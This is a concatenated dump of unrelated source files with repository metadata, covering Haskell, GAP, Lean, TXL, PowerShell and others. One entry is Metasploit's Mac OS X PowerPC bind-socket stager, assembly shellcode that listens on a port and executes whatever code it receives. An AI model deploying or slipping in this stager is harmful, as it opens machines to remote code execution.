source = "wait () = setTimeout ^ 1!
global.Promise = 'global promise'
console.log ('global promise' == Promise)"
write (source) toFile "promiseTest.pogo"!
output = runPogoCommand "promiseTest.pogo"!
output.stdout.should.equal "true\n"
it 'can be set to bluebird'
source = "wait () = setTimeout ^ 1!
bluebird = require 'bluebird'
console.log (bluebird == Promise)"
write (source) toFile "promiseTest.pogo"!
output = runPogoCommand "--promises bluebird promiseTest.pogo"!
output.stdout.should.equal "true\n"
it 'can be set to something else'
source = "wait () = setTimeout ^ 1!
myPromiseLib = require './myPromiseLib'
console.log (myPromiseLib == Promise)"
write (source) toFile "promiseTest.pogo"!
write 'module.exports = "my promise";' toFile "myPromiseLib.js"!
output = runPogoCommand "--promises ./myPromiseLib promiseTest.pogo"!
output.stdout.should.equal "true\n"
it 'can be set to none, using the global Promise'
source = "wait () = setTimeout ^ 1!
global.Promise = 'global promise'
console.log ('global promise' == Promise)"
write (source) toFile "promiseTest.pogo"!
output = runPogoCommand "--promises none promiseTest.pogo"!
output.stdout.should.equal "true\n"
context 'when evaluating'
promisesTests @(command)
run "pogo #(command)"!
context 'when compiling'
promisesTests @(command)
run "pogo -c #(command)"!
run "node promiseTest.js"!
| PogoScript | 5 | featurist/pogoscript | test/shell/pogoSpec.pogo | [
"BSD-2-Clause"
] |
# Copyright (c) 2018-2021, Carnegie Mellon University
# See LICENSE for details
Class(SMP_Unparser, SMP_UnparseMixin, CUnparserProg);
Class(SMP_MacroUnparser, SMP_UnparseMixin, CMacroUnparserProg);
Class(OpenMP_Unparser, OpenMP_UnparseMixin, CUnparserProg);
Class(OpenMP_MacroUnparser, OpenMP_UnparseMixin, CMacroUnparserProg);
# suggested values: bufIters=64 (16 for older machines), maxRank=1 (larger value increases search space)
# Example: opts := InitGTLibgen(64, 1)
#
InitGTLibgen := function(bufIters, maxRank, useComplex)
local opts;
LibgenHardcodeStrides();
opts := CopyFields(InitLibgen(When(useComplex, CplxLibgenDefaults, LibgenDefaults)),
rec(
useDeref := true,
breakdownRules := rec(
GT := [ CopyFields(GT_Base, rec(maxSize := 32)),
CopyFields(GT_BufReshape, rec(bufIters := bufIters)),
CopyFields(GT_DFT_CT, rec(minSize := 33, maxRank := maxRank)),
GT_NthLoop, GT_Par ],
DFT := [ CopyFields(DFT_CT, rec(maxSize:=32)),
CopyFields(DFT_GT_CT, rec(minSize:=32)),
DFT_Base ],
InfoNt := [Info_Base])
));
opts.formulaStrategies.preRC := [ HfuncSumsRules ];
return opts;
end;
InitSMPGTLibgen := function(bufIters, maxRank, useComplex, useOpenMP)
local opts;
opts := CopyFields(InitGTLibgen(bufIters, maxRank, useComplex), rec(
unparser := Cond(
useComplex and useOpenMP, OpenMP_MacroUnparser,
useComplex and not useOpenMP, SMP_MacroUnparser,
not useComplex and useOpenMP, OpenMP_Unparser,
not useComplex and not useOpenMP, SMP_Unparser)));
opts.formulaStrategies.sigmaSpl := [ MergedRuleSet(StandardSumsRules,RulesSMP), HfuncSumsRules ];
opts.formulaStrategies.rc := opts.formulaStrategies.sigmaSpl;
if not useOpenMP then
opts.subParams := [var("num_threads", TInt), var("tid", TInt)];
opts.profile := When(LocalConfig.osinfo.isWindows(),
LocalConfig.cpuinfo.profile.threads(),
profiler.default_profiles.linux_x86_threads
);
fi;
return opts;
end;
| GAP | 4 | sr7cb/spiral-software | namespaces/spiral/libgen/recgt.gi | [
"BSD-2-Clause-FreeBSD"
] |
;;
;
; Name: stager_sock_bind
; Qualities: Can Have Nulls
; Platforms: MacOS X / PPC
; Authors: H D Moore <hdm [at] metasploit.com>
; Version: $Revision: 1612 $
; License:
;
; This file is part of the Metasploit Exploit Framework
; and is subject to the same licenses and copyrights as
; the rest of this package.
;
; Description:
;
; Binds a port, listens, accepts, reads 8192 bytes and
; then jumps into the loaded payload. Socket descriptor
; is left in r30.
;;
.globl _main
.text
_main:
;; socket
li r3, 2
li r4, 1
li r5, 6
li r0, 97
sc
xor r0, r0, r0
mr r30, r3
bl bind
.long 0x00022212
.long 0x00000000
bind:
mflr r4
li r5, 0x10
li r0, 104
mr r3, r30
sc
xor r0, r0, r0
listen:
li r0, 106
mr r3, r30
sc
xor r0, r0, r0
accept:
mr r3, r30
li r0, 30
li r4, 16
stw r4, -24(r1)
subi r5, r1, 24
subi r4, r1, 16
sc
xor r0, r0, r0
mr r30, r3
reader:
li r0, 3
mr r3, r30
subi r4, r1, 8192
li r5, 8192
mtlr r4
sc
xor r0, r0, r0
blr
xor r0, r0, r0
| Assembly | 3 | OsmanDere/metasploit-framework | external/source/shellcode/osx/ppc/stager_sock_bind.asm | [
"BSD-2-Clause",
"BSD-3-Clause"
] |
MyConvertFrom-StringData @'
string1=fallback string1 for en-US
string2=fallback string2 for en-US
'@
42 | PowerShell | 2 | Jellyfrog/PowerShell | test/powershell/Language/Scripting/I18n.Tests_fallback.psd1 | [
"MIT"
] |
% Generic filtering of nonterminals
% Jim Cordy, May 2010
define xml_source_coordinate
'< [SPOFF] 'source [SP] 'file=[stringlit] [SP] 'startline=[stringlit] [SP] 'endline=[stringlit] '> [SPON] [NL]
end define
define end_xml_source_coordinate
[NL] '< [SPOFF] '/ 'source '> [SPON] [NL]
end define
define source_unit
[xml_source_coordinate]
[potential_clone]
[end_xml_source_coordinate]
end define
redefine program
[repeat source_unit]
end redefine
% Main program
rule main
% Get the list of nonterminals to be filtered
import TXLargs [stringlit*]
FilteredNTs [stringlit*]
% Make a global nothing
construct Empty [empty]
deconstruct * [any] Empty
Nothing [any]
export Nothing
skipping [source_unit]
replace $ [source_unit]
BeginXML [xml_source_coordinate]
PC [potential_clone]
EndXML [end_xml_source_coordinate]
by
BeginXML
PC [filter each FilteredNTs]
EndXML
end rule
rule filter FilteredNTstring [stringlit]
construct FilteredNT [id]
_ [unquote FilteredNTstring]
% Replace all the given NTs by nothing
import Nothing [any]
replace $ [any]
Any [any]
where
Any [istype FilteredNT]
by
Nothing
end rule
| TXL | 5 | coder-chenzhi/SQA | SourcererCC/parser/java/txl/generic-filter.txl | [
"Apache-2.0"
] |
attribute [reducible]
definition nat_has_add2 : has_add nat :=
has_add.mk (λ x y : nat, x + y)
attribute [reducible]
definition nat_has_add3 : nat → has_add nat :=
λ n, has_add.mk (λ x y : nat, x + y)
open tactic
set_option pp.all true
-- Example where instance canonization does not work.
-- Remark: we can "fix" it by re-running defeq_simp until there is no change.
-- However, this is too expensive. Well, if users want they can define their own defeq_simp that implements this
-- behavior.
example (a b : nat) (H : (λ x : nat, @has_add.add nat (nat_has_add3 x) a b) = (λ x : nat, @has_add.add nat nat_has_add2 a x)) : true :=
by do
s ← simp_lemmas.mk_default,
e ← get_local `H >>= infer_type, s^.dsimplify [] e {fail_if_unchanged := ff} >>= trace,
trace "---------",
-- The following should work
e ← get_local `H >>= infer_type,
e ← s^.dsimplify [] e {fail_if_unchanged := ff},
s^.dsimplify [] e {fail_if_unchanged := ff} >>= trace,
constructor
| Lean | 5 | ericrbg/lean | tests/lean/defeq_simp4.lean | [
"Apache-2.0"
] |
fileFormatVersion: 2
guid: cfba650367f74698998618a4a140d696
timeCreated: 1613591825 | Unity3D Asset | 0 | samisuleman10/open-project-1 | UOP1_Project/Assets/Scripts/SaveSystem/SerializableScriptableObject.cs.meta | [
"Apache-2.0"
] |
call %SCRIPT_HELPERS_DIR%\setup_pytorch_env.bat
echo Copying over test times file
copy /Y "%PYTORCH_FINAL_PACKAGE_DIR_WIN%\.pytorch-test-times.json" "%TEST_DIR_WIN%"
pushd test
echo Run jit_profiling tests
python run_test.py --include test_jit_legacy test_jit_fuser_legacy --verbose --determine-from="%1"
if ERRORLEVEL 1 exit /b 1
popd
| Batchfile | 3 | Hacky-DH/pytorch | .jenkins/pytorch/win-test-helpers/test_python_jit_legacy.bat | [
"Intel"
] |
{-# LANGUAGE DataKinds #-}
{-# LANGUAGE DeriveGeneric #-}
{-# LANGUAGE DeriveTraversable #-}
{-# LANGUAGE FlexibleContexts #-}
{-# LANGUAGE FlexibleInstances #-}
{-# LANGUAGE GeneralizedNewtypeDeriving #-}
{-# LANGUAGE OverloadedStrings #-}
{-# LANGUAGE RecordWildCards #-}
{-# LANGUAGE TypeFamilies #-}
{-# LANGUAGE TypeOperators #-}
{-# LANGUAGE ViewPatterns #-}
{-# OPTIONS_GHC
-fno-warn-unused-binds -fno-warn-unused-imports -fcontext-stack=328 #-}
module SwaggerPetstore.API
-- * Client and Server
( ServerConfig(..)
, SwaggerPetstoreBackend
, createSwaggerPetstoreClient
, runSwaggerPetstoreServer
, runSwaggerPetstoreClient
, runSwaggerPetstoreClientWithManager
, SwaggerPetstoreClient
-- ** Servant
, SwaggerPetstoreAPI
) where
import SwaggerPetstore.Types
import Control.Monad.Except (ExceptT)
import Control.Monad.IO.Class
import Data.Aeson (Value)
import Data.Coerce (coerce)
import Data.Function ((&))
import qualified Data.Map as Map
import Data.Monoid ((<>))
import Data.Proxy (Proxy(..))
import Data.Text (Text)
import qualified Data.Text as T
import GHC.Exts (IsString(..))
import GHC.Generics (Generic)
import Network.HTTP.Client (Manager, defaultManagerSettings, newManager)
import Network.HTTP.Types.Method (methodOptions)
import qualified Network.Wai.Handler.Warp as Warp
import Servant (ServantErr, serve)
import Servant.API
import Servant.API.Verbs (StdMethod(..), Verb)
import Servant.Client (Scheme(Http), ServantError, client)
import Servant.Common.BaseUrl (BaseUrl(..))
import Web.HttpApiData
data FormUpdatePetWithForm = FormUpdatePetWithForm
{ updatePetWithFormName :: Text
, updatePetWithFormStatus :: Text
} deriving (Show, Eq, Generic)
instance FromFormUrlEncoded FormUpdatePetWithForm where
fromFormUrlEncoded inputs = FormUpdatePetWithForm <$> lookupEither "name" inputs <*> lookupEither "status" inputs
instance ToFormUrlEncoded FormUpdatePetWithForm where
toFormUrlEncoded value =
[ ("name", toQueryParam $ updatePetWithFormName value)
, ("status", toQueryParam $ updatePetWithFormStatus value)
]
data FormUploadFile = FormUploadFile
{ uploadFileAdditionalMetadata :: Text
, uploadFileFile :: FilePath
} deriving (Show, Eq, Generic)
instance FromFormUrlEncoded FormUploadFile where
fromFormUrlEncoded inputs = FormUploadFile <$> lookupEither "additionalMetadata" inputs <*> lookupEither "file" inputs
instance ToFormUrlEncoded FormUploadFile where
toFormUrlEncoded value =
[ ("additionalMetadata", toQueryParam $ uploadFileAdditionalMetadata value)
, ("file", toQueryParam $ uploadFileFile value)
]
-- For the form data code generation.
lookupEither :: FromHttpApiData b => Text -> [(Text, Text)] -> Either String b
lookupEither key assocs =
case lookup key assocs of
Nothing -> Left $ "Could not find parameter " <> (T.unpack key) <> " in form data"
Just value ->
case parseQueryParam value of
Left result -> Left $ T.unpack result
Right result -> Right $ result
-- | Servant type-level API, generated from the Swagger spec for SwaggerPetstore.
-- One alternative per operation; the order of the alternatives here must match
-- the handler order in 'SwaggerPetstoreBackend' and the pattern in
-- 'createSwaggerPetstoreClient'.
type SwaggerPetstoreAPI
    = "pet" :> ReqBody '[JSON] Pet :> Verb 'POST 200 '[JSON] () -- 'addPet' route
    :<|> "pet" :> Capture "petId" Integer :> Header "api_key" Text :> Verb 'DELETE 200 '[JSON] () -- 'deletePet' route
    :<|> "pet" :> "findByStatus" :> QueryParam "status" (QueryList 'CommaSeparated (Text)) :> Verb 'GET 200 '[JSON] [Pet] -- 'findPetsByStatus' route
    :<|> "pet" :> "findByTags" :> QueryParam "tags" (QueryList 'CommaSeparated (Text)) :> Verb 'GET 200 '[JSON] [Pet] -- 'findPetsByTags' route
    :<|> "pet" :> Capture "petId" Integer :> Verb 'GET 200 '[JSON] Pet -- 'getPetById' route
    :<|> "pet" :> ReqBody '[JSON] Pet :> Verb 'PUT 200 '[JSON] () -- 'updatePet' route
    :<|> "pet" :> Capture "petId" Integer :> ReqBody '[FormUrlEncoded] FormUpdatePetWithForm :> Verb 'POST 200 '[JSON] () -- 'updatePetWithForm' route
    :<|> "pet" :> Capture "petId" Integer :> "uploadImage" :> ReqBody '[FormUrlEncoded] FormUploadFile :> Verb 'POST 200 '[JSON] ApiResponse -- 'uploadFile' route
    :<|> "store" :> "order" :> Capture "orderId" Text :> Verb 'DELETE 200 '[JSON] () -- 'deleteOrder' route
    :<|> "store" :> "inventory" :> Verb 'GET 200 '[JSON] (Map.Map String Int) -- 'getInventory' route
    :<|> "store" :> "order" :> Capture "orderId" Integer :> Verb 'GET 200 '[JSON] Order -- 'getOrderById' route
    :<|> "store" :> "order" :> ReqBody '[JSON] Order :> Verb 'POST 200 '[JSON] Order -- 'placeOrder' route
    :<|> "user" :> ReqBody '[JSON] User :> Verb 'POST 200 '[JSON] () -- 'createUser' route
    :<|> "user" :> "createWithArray" :> ReqBody '[JSON] [User] :> Verb 'POST 200 '[JSON] () -- 'createUsersWithArrayInput' route
    :<|> "user" :> "createWithList" :> ReqBody '[JSON] [User] :> Verb 'POST 200 '[JSON] () -- 'createUsersWithListInput' route
    :<|> "user" :> Capture "username" Text :> Verb 'DELETE 200 '[JSON] () -- 'deleteUser' route
    :<|> "user" :> Capture "username" Text :> Verb 'GET 200 '[JSON] User -- 'getUserByName' route
    :<|> "user" :> "login" :> QueryParam "username" Text :> QueryParam "password" Text :> Verb 'GET 200 '[JSON] Text -- 'loginUser' route
    :<|> "user" :> "logout" :> Verb 'GET 200 '[JSON] () -- 'logoutUser' route
    :<|> "user" :> Capture "username" Text :> ReqBody '[JSON] User :> Verb 'PUT 200 '[JSON] () -- 'updateUser' route
-- | Server or client configuration, specifying the host and port to query or serve on.
-- Consumed by 'runSwaggerPetstoreServer' and 'runSwaggerPetstoreClient'.
data ServerConfig = ServerConfig
  { configHost :: String -- ^ Hostname to serve on, e.g. "127.0.0.1"
  , configPort :: Int -- ^ Port to serve on, e.g. 8080
  } deriving (Eq, Ord, Show, Read)
-- | List of elements parsed from a query.
-- The phantom index @p :: CollectionFormat@ records (at the type level) how
-- the list is serialized, so each format gets its own To\/FromHttpApiData
-- instance below.
newtype QueryList (p :: CollectionFormat) a = QueryList
  { fromQueryList :: [a]
  } deriving (Functor, Applicative, Monad, Foldable, Traversable)
-- | Formats in which a list can be encoded into a HTTP path.
-- Used only as a promoted (type-level) tag on 'QueryList'.
data CollectionFormat
  = CommaSeparated -- ^ CSV format for multiple parameters.
  | SpaceSeparated -- ^ Also called "SSV"
  | TabSeparated -- ^ Also called "TSV"
  | PipeSeparated -- ^ `value1|value2|value2`
  | MultiParamArray -- ^ Using multiple GET parameters, e.g. `foo=bar&foo=baz`. Only for GET params.
-- Decoding: split the raw query text on the format's separator character and
-- parse each piece. MultiParamArray cannot be expressed as a single query
-- value, so its instance is a runtime error if ever reached.
instance FromHttpApiData a => FromHttpApiData (QueryList 'CommaSeparated a) where
  parseQueryParam = parseSeparatedQueryList ','
instance FromHttpApiData a => FromHttpApiData (QueryList 'TabSeparated a) where
  parseQueryParam = parseSeparatedQueryList '\t'
instance FromHttpApiData a => FromHttpApiData (QueryList 'SpaceSeparated a) where
  parseQueryParam = parseSeparatedQueryList ' '
instance FromHttpApiData a => FromHttpApiData (QueryList 'PipeSeparated a) where
  parseQueryParam = parseSeparatedQueryList '|'
instance FromHttpApiData a => FromHttpApiData (QueryList 'MultiParamArray a) where
  parseQueryParam = error "unimplemented FromHttpApiData for MultiParamArray collection format"
-- | Split @txt@ on @sep@ and parse every fragment; the first parse failure
-- fails the whole list (Either's Applicative is short-circuiting).
parseSeparatedQueryList :: FromHttpApiData a => Char -> Text -> Either Text (QueryList p a)
parseSeparatedQueryList sep txt = QueryList <$> traverse parseQueryParam (T.split (== sep) txt)
-- Encoding: render each element and join with the format's separator.
-- As with decoding, MultiParamArray has no single-value rendering and is a
-- runtime error if ever reached.
instance ToHttpApiData a => ToHttpApiData (QueryList 'CommaSeparated a) where
  toQueryParam = formatSeparatedQueryList ','
instance ToHttpApiData a => ToHttpApiData (QueryList 'TabSeparated a) where
  toQueryParam = formatSeparatedQueryList '\t'
instance ToHttpApiData a => ToHttpApiData (QueryList 'SpaceSeparated a) where
  toQueryParam = formatSeparatedQueryList ' '
instance ToHttpApiData a => ToHttpApiData (QueryList 'PipeSeparated a) where
  toQueryParam = formatSeparatedQueryList '|'
instance ToHttpApiData a => ToHttpApiData (QueryList 'MultiParamArray a) where
  toQueryParam = error "unimplemented ToHttpApiData for MultiParamArray collection format"
-- | Render every element of the list and join the pieces with @sep@.
formatSeparatedQueryList :: ToHttpApiData a => Char -> QueryList p a -> Text
formatSeparatedQueryList sep (QueryList xs) = T.intercalate (T.singleton sep) (map toQueryParam xs)
-- | Backend for SwaggerPetstore.
-- The backend can be used both for the client and the server. The client generated from the SwaggerPetstore Swagger spec
-- is a backend that executes actions by sending HTTP requests (see @createSwaggerPetstoreClient@). Alternatively, provided
-- a backend, the API can be served using @runSwaggerPetstoreServer@.
-- Field order must mirror the route order in 'SwaggerPetstoreAPI'.
data SwaggerPetstoreBackend m = SwaggerPetstoreBackend
  { addPet :: Pet -> m (){- ^ -}
  , deletePet :: Integer -> Maybe Text -> m (){- ^ -}
  , findPetsByStatus :: Maybe [Text] -> m [Pet]{- ^ Multiple status values can be provided with comma separated strings -}
  , findPetsByTags :: Maybe [Text] -> m [Pet]{- ^ Multiple tags can be provided with comma separated strings. Use tag1, tag2, tag3 for testing. -}
  , getPetById :: Integer -> m Pet{- ^ Returns a single pet -}
  , updatePet :: Pet -> m (){- ^ -}
  , updatePetWithForm :: Integer -> FormUpdatePetWithForm -> m (){- ^ -}
  , uploadFile :: Integer -> FormUploadFile -> m ApiResponse{- ^ -}
  , deleteOrder :: Text -> m (){- ^ For valid response try integer IDs with value < 1000. Anything above 1000 or nonintegers will generate API errors -}
  , getInventory :: m (Map.Map String Int){- ^ Returns a map of status codes to quantities -}
  , getOrderById :: Integer -> m Order{- ^ For valid response try integer IDs with value <= 5 or > 10. Other values will generated exceptions -}
  , placeOrder :: Order -> m Order{- ^ -}
  , createUser :: User -> m (){- ^ This can only be done by the logged in user. -}
  , createUsersWithArrayInput :: [User] -> m (){- ^ -}
  , createUsersWithListInput :: [User] -> m (){- ^ -}
  , deleteUser :: Text -> m (){- ^ This can only be done by the logged in user. -}
  , getUserByName :: Text -> m User{- ^ -}
  , loginUser :: Maybe Text -> Maybe Text -> m Text{- ^ -}
  , logoutUser :: m (){- ^ -}
  , updateUser :: Text -> User -> m (){- ^ This can only be done by the logged in user. -}
  }
-- | A client action: a function of the connection 'Manager' and the server
-- 'BaseUrl', returning in @ExceptT ServantError IO@. Effectively a Reader
-- over the connection settings, which the instances below thread through.
newtype SwaggerPetstoreClient a = SwaggerPetstoreClient
  { runClient :: Manager -> BaseUrl -> ExceptT ServantError IO a
  } deriving Functor
instance Applicative SwaggerPetstoreClient where
  -- pure ignores the environment; <*> feeds the same manager/url to both sides.
  pure x = SwaggerPetstoreClient (\_ _ -> pure x)
  (SwaggerPetstoreClient f) <*> (SwaggerPetstoreClient x) =
    SwaggerPetstoreClient (\manager url -> f manager url <*> x manager url)
instance Monad SwaggerPetstoreClient where
  -- Sequencing reuses the same environment for the continuation.
  (SwaggerPetstoreClient a) >>= f =
    SwaggerPetstoreClient (\manager url -> do
      value <- a manager url
      runClient (f value) manager url)
instance MonadIO SwaggerPetstoreClient where
  liftIO io = SwaggerPetstoreClient (\_ _ -> liftIO io)
-- | Build a backend whose every operation issues the corresponding HTTP
-- request. @client@ produces one function per route (in 'SwaggerPetstoreAPI'
-- order); each @(coerce -> name)@ view pattern wraps that function into
-- 'SwaggerPetstoreClient' (the representations coincide, so 'coerce' is
-- zero-cost), and RecordWildCards assembles the record from the bound names.
-- The alternatives here must stay in the exact order of the API type.
createSwaggerPetstoreClient :: SwaggerPetstoreBackend SwaggerPetstoreClient
createSwaggerPetstoreClient = SwaggerPetstoreBackend{..}
  where
    ((coerce -> addPet) :<|>
     (coerce -> deletePet) :<|>
     (coerce -> findPetsByStatus) :<|>
     (coerce -> findPetsByTags) :<|>
     (coerce -> getPetById) :<|>
     (coerce -> updatePet) :<|>
     (coerce -> updatePetWithForm) :<|>
     (coerce -> uploadFile) :<|>
     (coerce -> deleteOrder) :<|>
     (coerce -> getInventory) :<|>
     (coerce -> getOrderById) :<|>
     (coerce -> placeOrder) :<|>
     (coerce -> createUser) :<|>
     (coerce -> createUsersWithArrayInput) :<|>
     (coerce -> createUsersWithListInput) :<|>
     (coerce -> deleteUser) :<|>
     (coerce -> getUserByName) :<|>
     (coerce -> loginUser) :<|>
     (coerce -> logoutUser) :<|>
     (coerce -> updateUser)) = client (Proxy :: Proxy SwaggerPetstoreAPI)
-- | Run requests in the SwaggerPetstoreClient monad.
-- Allocates a fresh 'Manager' per call with default (plain-HTTP) settings;
-- for connection reuse or TLS, use 'runSwaggerPetstoreClientWithManager'.
runSwaggerPetstoreClient :: ServerConfig -> SwaggerPetstoreClient a -> ExceptT ServantError IO a
runSwaggerPetstoreClient clientConfig cl = do
  manager <- liftIO $ newManager defaultManagerSettings
  runSwaggerPetstoreClientWithManager manager clientConfig cl
-- | Run requests in the SwaggerPetstoreClient monad using a custom manager.
-- The scheme is fixed to HTTP; host and port come from the 'ServerConfig'.
runSwaggerPetstoreClientWithManager :: Manager -> ServerConfig -> SwaggerPetstoreClient a -> ExceptT ServantError IO a
runSwaggerPetstoreClientWithManager manager clientConfig cl =
  runClient cl manager $ BaseUrl Http (configHost clientConfig) (configPort clientConfig) ""
-- | Run the SwaggerPetstore server at the provided host and port.
-- Each backend action runs in @ExceptT ServantErr IO@; 'coerce' adapts the
-- record's fields to the handler types servant expects (order must match
-- 'SwaggerPetstoreAPI'). Blocks serving via Warp until the process exits.
runSwaggerPetstoreServer :: MonadIO m => ServerConfig -> SwaggerPetstoreBackend (ExceptT ServantErr IO) -> m ()
runSwaggerPetstoreServer ServerConfig{..} backend =
  liftIO $ Warp.runSettings warpSettings $ serve (Proxy :: Proxy SwaggerPetstoreAPI) (serverFromBackend backend)
  where
    warpSettings = Warp.defaultSettings & Warp.setPort configPort & Warp.setHost (fromString configHost)
    -- Unpack the backend record and rebuild the servant handler tree.
    serverFromBackend SwaggerPetstoreBackend{..} =
      (coerce addPet :<|>
       coerce deletePet :<|>
       coerce findPetsByStatus :<|>
       coerce findPetsByTags :<|>
       coerce getPetById :<|>
       coerce updatePet :<|>
       coerce updatePetWithForm :<|>
       coerce uploadFile :<|>
       coerce deleteOrder :<|>
       coerce getInventory :<|>
       coerce getOrderById :<|>
       coerce placeOrder :<|>
       coerce createUser :<|>
       coerce createUsersWithArrayInput :<|>
       coerce createUsersWithListInput :<|>
       coerce deleteUser :<|>
       coerce getUserByName :<|>
       coerce loginUser :<|>
       coerce logoutUser :<|>
       coerce updateUser)
| Haskell | 5 | wwadge/swagger-codegen | samples/server/petstore/haskell-servant/lib/SwaggerPetstore/API.hs | [
"Apache-2.0"
] |
fn bar<const X: u8, 'a>(_: &'a ()) {
//~^ ERROR lifetime parameters must be declared prior to const parameters
// Body intentionally empty: the test only checks the parameter-order
// diagnostic on the signature above. (Comments are added *after* the
// annotated line so the expected error location does not shift.)
}
// Control case: a const parameter before a *type* parameter is accepted
// (only lifetimes must come first), so no error is expected here.
fn foo<const X: u8, T>(_: &T) {}
fn main() {}
| Rust | 4 | ohno418/rust | src/test/ui/const-generics/const-param-before-other-params.rs | [
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] |
// Sets the parcel's streaming music URL once, when the script starts.
// NOTE(review): llSetParcelMusicURL only takes effect when the object owner
// also owns the parcel — confirm deployment matches that assumption.
default
{
    state_entry()
    {
        // Point the parcel audio stream at an archive.org-hosted MP3.
        llSetParcelMusicURL("http://www.archive.org/download/Torley_Wong_-_The_Final_Selection/Torley_Wong-Lovers__Dance.mp3");
    }
}
| LSL | 3 | Misterblue/opensim | bin/assets/ScriptsAssetSet/llSetParcelMusicURL.lsl | [
"BSD-3-Clause"
] |
program HelloWorld;
{ Minimal Delphi console program. The $APPTYPE CONSOLE directive makes the
  linker build a console-subsystem executable so WriteLn has a console. }
{$APPTYPE CONSOLE}
begin
  WriteLn('Hello World');
end.
"MIT"
] |
--
section
  variable A : Type
  parameter a : A
end
section
  variable A : Type
  variable a : A
end
-- NOTE(review): appears to check that `variable`/`parameter` declarations are
-- local to their enclosing `section`, so `A` and `a` can be re-declared in a
-- later section. Comments kept at end of file so expected-output line
-- references (if any) stay valid.
| Lean | 4 | JLimperg/lean | tests/lean/var.lean | [
"Apache-2.0"
] |
domain: "[M, N, O, P, Q, R, S, T, U] -> { S1[i0, i1, i2] : i0 >= 1 and i0 <= -1 + O and i1 >= Q and i1 <= -1 + N and i2 >= P and i2 <= -1 + M; S3[i0, i1, i2] : i0 >= 1 and i0 <= -1 + O and i1 >= 1 and i1 <= -1 + N and i2 >= P and i2 <= -1 + M; S4[i0, i1, i2] : i0 >= 1 and i0 <= -1 + O and i1 >= 1 and i1 <= -1 + N and i2 >= 1 and i2 <= -1 + M; S2[i0, i1, i2] : i0 >= 1 and i0 <= -1 + O and i1 >= Q and i1 <= -1 + N and i2 >= 1 and i2 <= -1 + M }"
child:
context: "[M, N, O, P, Q, R, S, T, U] -> { [] : M >= 10 and N >= 10 and O >= 10 and P >= 1 and P <= 2 and Q >= 1 and Q <= 2 and R >= 1 and R <= 2 and S >= 0 and S <= 1 and T >= 0 and T <= 1 and U >= 0 and U <= 1 }"
child:
schedule: "[M, N, O, P, Q, R, S, T, U] -> [{ S4[i0, i1, i2] -> [(i0)]; S2[i0, i1, i2] -> [(i0)]; S1[i0, i1, i2] -> [(i0)]; S3[i0, i1, i2] -> [(i0)] }]"
options: "[M, N, O, P, Q, R, S, T, U] -> { separate[i0] }"
child:
sequence:
- filter: "[M, N, O, P, Q, R, S, T, U] -> { S1[i0, i1, i2]; S2[i0, i1, i2] }"
child:
schedule: "[M, N, O, P, Q, R, S, T, U] -> [{ S2[i0, i1, i2] -> [(i1)]; S1[i0, i1, i2] -> [(i1)] }]"
options: "[M, N, O, P, Q, R, S, T, U] -> { separate[i0] }"
child:
sequence:
- filter: "[M, N, O, P, Q, R, S, T, U] -> { S1[i0, i1, i2] }"
child:
schedule: "[M, N, O, P, Q, R, S, T, U] -> [{ S1[i0, i1, i2] -> [(i2)] }]"
options: "[M, N, O, P, Q, R, S, T, U] -> { separate[i0] }"
- filter: "[M, N, O, P, Q, R, S, T, U] -> { S2[i0, i1, i2] }"
child:
schedule: "[M, N, O, P, Q, R, S, T, U] -> [{ S2[i0, i1, i2] -> [(i2)] }]"
options: "[M, N, O, P, Q, R, S, T, U] -> { separate[i0] }"
- filter: "[M, N, O, P, Q, R, S, T, U] -> { S3[i0, i1, i2]; S4[i0, i1, i2] }"
child:
schedule: "[M, N, O, P, Q, R, S, T, U] -> [{ S4[i0, i1, i2] -> [(i1)]; S3[i0, i1, i2] -> [(i1)] }]"
options: "[M, N, O, P, Q, R, S, T, U] -> { separate[i0] }"
child:
sequence:
- filter: "[M, N, O, P, Q, R, S, T, U] -> { S3[i0, i1, i2] }"
child:
schedule: "[M, N, O, P, Q, R, S, T, U] -> [{ S3[i0, i1, i2] -> [(i2)] }]"
options: "[M, N, O, P, Q, R, S, T, U] -> { separate[i0] }"
- filter: "[M, N, O, P, Q, R, S, T, U] -> { S4[i0, i1, i2] }"
child:
schedule: "[M, N, O, P, Q, R, S, T, U] -> [{ S4[i0, i1, i2] -> [(i2)] }]"
options: "[M, N, O, P, Q, R, S, T, U] -> { separate[i0] }"
| Smalltalk | 2 | chelini/isl-haystack | test_inputs/codegen/cloog/reservoir-long.st | [
"MIT"
] |
//
// Copyright (c) Microsoft. All rights reserved.
// Licensed under the MIT license. See LICENSE.md file in the project root for full license information.
//
#pragma once
#include "ConvolutionEngine.h"
#include "BatchNormalizationEngine.h"
namespace Microsoft { namespace MSR { namespace CNTK {
// Factory for cuDNN-backed convolution engines, parameterized on the element type.
template <class ElemType>
class CuDnnConvolutionEngineFactory
{
public:
    // Creates a convolution engine for the given geometry on the given device.
    // Parameter names suggest: maxTempMemSizeInSamples bounds temporary/workspace
    // memory and forceDeterministicAlgorithms restricts algorithm choice to
    // deterministic ones — TODO confirm against the .cpp implementation.
    static std::unique_ptr<ConvolutionEngine<ElemType>> Create(ConvolveGeometryPtr geometry, DEVICEID_TYPE deviceId,
                                                               ImageLayoutKind imageLayout, size_t maxTempMemSizeInSamples,
                                                               PoolKind poolKind, bool forceDeterministicAlgorithms,
                                                               bool poolIncludePad, bool inputHasFreeDimension);
    // Whether the cuDNN path can handle this geometry/pooling on the device.
    static bool IsSupported(DEVICEID_TYPE deviceId, ConvolveGeometryPtr geometry, PoolKind poolKind);
};
// Factory for cuDNN-backed batch-normalization engines; InoutType is the
// activation element type, StatType the type used for the running statistics.
template <class InoutType, class StatType>
class CuDnnBatchNormEngineFactory
{
public:
    static std::unique_ptr<BatchNormEngine<InoutType, StatType>> Create(DEVICEID_TYPE deviceId, const TensorShape& inOutT,
                                                                        bool spatial, ImageLayoutKind imageLayout);
};
// REVIEW alexeyk: wrong place? It is currently used only in unit tests but I can't add it there because of the build issues.
// Timer that can be used to measure CUDA calls.
// Uses CUDA event and will synchronize(!) the stream when Stop is called.
class MATH_API CudaTimer
{
public:
    // Members start null; the events are presumably created lazily in Start() —
    // TODO confirm in the implementation file.
    CudaTimer(): m_start(nullptr), m_stop(nullptr)
    {
    }
    ~CudaTimer();
    void Start();            // record the start event
    void Stop();             // record the stop event (synchronizes the stream, per note above)
    float Elapsed();         // elapsed time between Start and Stop
    DISABLE_COPY_AND_MOVE(CudaTimer); // owns raw event handles; copying would double-free
private:
    // Opaque CUDA event handles (kept as void* so this header needs no CUDA headers).
    void* m_start;
    void* m_stop;
};
} } }
| C | 4 | burhandodhy/CNTK | Source/Math/CuDnnFactories.h | [
